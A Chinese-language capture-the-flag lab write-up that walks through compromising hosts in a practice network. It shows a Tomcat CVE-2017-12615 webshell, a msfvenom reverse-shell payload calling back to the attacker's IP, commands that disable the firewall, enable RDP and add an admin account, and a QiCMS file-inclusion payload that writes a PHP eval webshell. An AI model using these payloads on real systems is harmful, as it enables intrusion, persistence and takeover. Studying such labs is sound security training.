【Cyberstrikelab】lab2

环境信息

Kali的IP地址：172.16.233.2

主机扫描

sudo nmap -sS 192.168.10.0/24

发现3台主机：192.168.10.10、192.168.10.20、192.168.10.233

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 06:01 EDT
Nmap scan report for 192.168.10.10
Host is up (0.074s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
808/tcp  open  ccproxy-http
3306/tcp open  mysqlNmap scan report for 192.168.10.20
Host is up (0.075s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

192.168.10.20

访问8080端口出现Tomcat后台

CVE-2017-12615

使用TomcatScanPro对Tomcat进行扫描，发现存在CVE-2017-12615漏洞

访问写入的webshell，发现是可以的

查看下TomcatScanPro的配置文件，可知写入的webshell密码为pass

使用哥斯拉进行连接

得到flag

webshell的权限比较低

用下PetitPotam提权

上线msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=6000 -f exe -o win2012.exe

在kali上开启监听

这里用哥斯拉将win2012木马上传到C:/Users/Public中再运行，我上传到网站目录无法运行得到shell

进程迁移+添加路由

添加代理

收集内网信息

发现还有一个192.168.20.0网段

如果这里哥斯拉出现中文乱码，修改下编码即可

关闭防火墙&开启远程连接&添加用户&添加管路员组

# 闭目标防火墙
netsh advfirewall set allprofiles state off
# 打开远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /
# 添加组，添加账户
net user dfz 123@abc /add
net localgroup Administrators dfz /add
# 解决“要求的函数不受支持”错误
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f    

fscan

登录远程桌面并上传fscan扫描内网

发现另一台内网主机192.168.20.30

但是扫描并没有什么收获

看到192.168.20.30是win2008的系统，虽然fscan没有爆ms17_010但是可以进行尝试

windows/smb/ms17_010_eternalblue

上线CS

192.168.10.10

访问192.168.10.10的808端口发现是骑士CMS

骑士CMS文件包含漏洞

有一个文件包含getshell的漏洞，影响范围：骑士cms

先发送一个post包

POST地址：http://192.168.10.10:808/index.php?m=home&a=assign_resume_tplPOST内容：variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

对应的目录就会生成当前时间的日志文件

然后再包含下这个日志文件，这里注意你当时的时间，因为日志文件名称是以日期来命名的。

POST内容：variable=1&tpl=data/Runtime/Logs/Home/25_04_25.log

这样当我们访问这个日志文件的时候，我们之前的webshell代码就会执行，在目录下生成一个shell.php的一句话木马

用哥斯拉进行连接

得到flag

收集内网信息

发现只有一个网段，故这个主机渗透就到此为止